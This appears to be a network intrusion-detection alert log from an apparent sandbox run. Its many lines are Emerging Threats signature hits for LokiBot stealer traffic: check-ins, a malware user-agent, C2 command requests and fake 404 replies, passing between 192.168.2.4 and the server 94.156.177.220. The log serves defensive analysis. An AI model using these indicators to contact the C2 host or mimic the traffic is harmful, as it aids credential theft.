2024-10-25T10:21:02.418624+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49805	TCP
2024-10-25T10:21:02.575992+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:02.575992+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:02.575992+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:03.549599+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:03.549599+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:03.555551+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49811	TCP
2024-10-25T10:21:04.300437+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:04.300437+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:04.300437+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:05.290132+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:05.290132+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:05.295989+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49822	TCP
2024-10-25T10:21:05.450685+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:05.450685+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:05.450685+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:06.443742+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:06.443742+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:06.449512+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49828	TCP
2024-10-25T10:21:06.702578+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:06.702578+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:06.702578+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:07.670809+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:07.670809+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:07.676728+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49836	TCP
2024-10-25T10:21:07.823534+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:07.823534+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:07.823534+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:08.796273+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:08.796273+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:08.802409+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49842	TCP
2024-10-25T10:21:08.970566+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:08.970566+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:08.970566+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:09.928770+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:09.928770+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:09.934486+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49851	TCP
2024-10-25T10:21:10.210497+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:10.210497+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:10.210497+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:11.186518+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:11.186518+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:11.192386+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49858	TCP
2024-10-25T10:21:11.347066+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:11.347066+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:11.347066+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:12.311125+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:12.311125+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:12.316954+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49864	TCP
2024-10-25T10:21:12.693350+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:12.693350+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:12.693350+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:13.646861+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:13.646861+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:13.652804+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49871	TCP
2024-10-25T10:21:13.812456+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:13.812456+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:13.812456+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:14.786667+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:14.786667+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:14.792765+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49877	TCP
2024-10-25T10:21:14.957762+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:14.957762+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:14.957762+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:15.924397+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:15.924397+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:15.930332+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49883	TCP
2024-10-25T10:21:16.552285+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:16.552285+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:16.552285+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:17.523591+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:17.523591+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:17.529729+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49894	TCP
2024-10-25T10:21:17.694981+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:17.694981+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:17.694981+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:18.678850+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:18.678850+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:18.684574+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49900	TCP
2024-10-25T10:21:19.204894+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:19.204894+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:19.204894+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:20.169405+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:20.169405+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:20.175088+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49910	TCP
2024-10-25T10:21:20.326057+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:20.326057+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:20.326057+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:21.278945+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:21.278945+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:21.284965+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49917	TCP
2024-10-25T10:21:21.441410+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:21.441410+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:21.441410+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:22.431466+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:22.431466+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:22.437264+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49924	TCP
2024-10-25T10:21:22.907366+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:22.907366+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:22.907366+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:23.917885+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:23.917885+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:23.924135+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49934	TCP
2024-10-25T10:21:24.073735+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:24.073735+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:24.073735+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:25.060705+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:25.060705+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:25.066881+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49940	TCP
2024-10-25T10:21:25.575978+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:25.575978+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:25.575978+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:26.544494+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:26.544494+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:26.551185+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49947	TCP
2024-10-25T10:21:26.705064+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:26.705064+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:26.705064+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:27.664575+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:27.664575+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:27.670578+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49954	TCP
2024-10-25T10:21:27.827107+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:27.827107+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:27.827107+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:28.795766+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:28.795766+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:28.801641+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49963	TCP
2024-10-25T10:21:28.952302+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:28.952302+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:28.952302+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:29.966249+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:29.966249+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:29.973087+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49969	TCP
2024-10-25T10:21:30.120093+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:30.120093+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:30.120093+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:31.093840+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:31.093840+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:31.099993+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49975	TCP
2024-10-25T10:21:31.244679+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:31.244679+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:31.244679+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:32.205975+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:32.205975+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:32.212011+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49985	TCP
2024-10-25T10:21:32.352236+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:32.352236+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:32.352236+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:33.334821+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:33.334821+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:33.340436+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49991	TCP
2024-10-25T10:21:33.496323+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:33.496323+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:33.496323+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:34.473111+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:34.473111+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:34.478912+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	49998	TCP
2024-10-25T10:21:34.650472+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:34.650472+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:34.650472+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:35.623881+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:35.623881+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:35.629820+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50005	TCP
2024-10-25T10:21:35.782292+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:35.782292+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:35.782292+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:36.765800+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:36.765800+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:36.772729+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50014	TCP
2024-10-25T10:21:36.922599+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:36.922599+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:36.922599+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:37.890035+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:37.890035+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:37.895860+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50021	TCP
2024-10-25T10:21:38.071599+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:38.071599+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:38.071599+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:39.040400+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:39.040400+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:39.046534+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50027	TCP
2024-10-25T10:21:39.204843+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:39.204843+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:39.204843+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:40.344341+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:40.344341+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:40.350403+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50033	TCP
2024-10-25T10:21:40.499810+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:40.499810+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:40.499810+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:41.490818+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:41.490818+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:41.496560+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50039	TCP
2024-10-25T10:21:41.653914+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:41.653914+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:41.653914+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:42.628356+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:42.628356+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:42.635640+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50050	TCP
2024-10-25T10:21:42.775266+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:42.775266+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:42.775266+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:43.771661+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50056	94.156.177.220	80	TCP
